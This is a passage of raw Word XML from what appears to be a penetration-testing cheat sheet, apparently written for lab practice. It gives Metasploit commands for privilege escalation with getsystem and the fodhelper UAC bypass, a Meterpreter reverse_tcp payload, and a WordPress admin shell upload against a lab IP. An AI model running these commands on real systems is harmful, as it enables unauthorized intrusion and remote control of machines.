          <w:p w14:paraId="0EAAA0A7" w14:textId="77777777" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12067C85" w14:textId="01CCCA94" w:rsidR="007F62DC" w:rsidRDefault="00674016" w:rsidP="00810789">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00674016">
              <w:t xml:space="preserve">Now, we shall try to escalate the privileges by issuing a </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">getsystem </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>command that attempts to elevate the user privileges</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>getsystem</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>(Try ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00255945">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>getsystem</w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>’ if this doesn’t work)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>If at first we lack privilieges to do this command, try:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/windows/local/bypassuac_fodhelper</w:t>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00B71A19" w:rsidRPr="00B71A19">
              <w:t>Setting the session for this exploit is necessary:</w:t>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B71A19" w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>show options</w:t>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B71A19" w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidR="00B71A19" w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>SESSION</w:t>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B71A19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC37AE9" w14:textId="77777777" w:rsidR="00B71A19" w:rsidRDefault="00B71A19" w:rsidP="00810789">
            <w:r w:rsidRPr="00B71A19">
              <w:t>Now that we have configured the exploit, our next step will be to set and configure a payload</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C6AB2D" w14:textId="77777777" w:rsidR="00B71A19" w:rsidRDefault="00B71A19" w:rsidP="00810789">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A430C4B" w14:textId="77777777" w:rsidR="00B71A19" w:rsidRDefault="00B71A19" w:rsidP="00810789">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B71A19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E1E6F5" w14:textId="2ED4EC17" w:rsidR="00B71A19" w:rsidRDefault="00255945" w:rsidP="00810789">
            <w:r>
              <w:t>Leave the port alone unless it needs to be modified (port 4444). And try again:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> getsystem</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>(Try ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00255945">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>getsystem</w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>’ if this doesn’t work)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1D85" w14:paraId="6CE87011" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="672A519C" w14:textId="23362502" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:r>
              <w:t>74.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D89BA77" w14:textId="49307B20" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AEFFE48" w14:textId="1A600BCA" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:r>
              <w:t>This website is a database of Unix binaries files that can be used to bypass local security restrictions in possibly misconfigured systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C35D8C" w14:textId="5A09C5B2" w:rsidR="00DB1D85" w:rsidRPr="00674016" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:r>
              <w:tab/>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="00F0104F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://gtfobins.github.io/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1D85" w14:paraId="69F1E039" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="056E134D" w14:textId="6B7AF370" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:r>
              <w:t>74.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AE71EFA" w14:textId="19B33707" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>fieldraccoon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F9C4AE4" w14:textId="6F2B938D" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00810789">
            <w:r>
              <w:t>This blog has a list of many popular, common privilege escalation techniques.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="00F0104F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://fieldraccoon.github.io/posts/Linuxprivesc/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00520A0D" w14:paraId="17F36631" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61832EC7" w14:textId="77777777" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00810789"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00A6607D" w14:textId="77777777" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09D05256" w14:textId="77777777" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00810789"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="083CD08A" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE"/>
    <w:p w14:paraId="77E2C060" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB1D3B" w14:textId="40BA1F42" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00175FBE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WordPress</w:t>
      </w:r>
      <w:r w:rsidR="00190FDB" w:rsidRPr="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> wp_admin_shell_upload</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="654"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2395"/>
        <w:gridCol w:w="8021"/>
      </w:tblGrid>
      <w:tr w:rsidR="00175FBE" w14:paraId="26AE9330" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C9D5219" w14:textId="4DD22839" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A6377FA" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64FE8510" w14:textId="435A50C4" w:rsidR="00175FBE" w:rsidRPr="00552DEC" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF </w:t>
            </w:r>
            <w:r w:rsidR="00190FDB">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>THERE IS A WORDPRESS WEB APP LOGIN PAGE, THEN WE CAN ATTEMPT TO EITHER BRUTE FORCE ENTRY OR UPLOAD A SHELL VIA METERPRETER.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1343AF73" w14:textId="7D0D7A14" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Start-up</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t xml:space="preserve"> msfconsole with the command: </w:t>
            </w:r>
            <w:r w:rsidR="00175FBE" w:rsidRPr="00190FDB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="45D2EE28" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12516C10" w14:textId="3A790F50" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="58AB4A33" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E4A5CB2" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRPr="00EC64F5" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Search for this exploit on Metasploit:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">search </w:t>
            </w:r>
            <w:r w:rsidRPr="00D802C5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/unix/webapp/wp_admin_shell_upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="294D659D" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48075809" w14:textId="1D5551E0" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CC93380" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DC9945C" w14:textId="31D5FD44" w:rsidR="00175FBE" w:rsidRPr="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="003804BA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/unix/webapp/wp_admin_shell_upload</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="003804BA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>P@s5w0rd!</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGETURI </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/wordpress</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOSTS </w:t>
            </w:r>
            <w:r w:rsidRPr="00085B79">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.29</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00190FDB" w:rsidRPr="00190FDB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>This works once you have the username and password, otherwise see .i below…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="222B5DE2" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="194009DC" w14:textId="5113B95F" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48C6FDE2" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
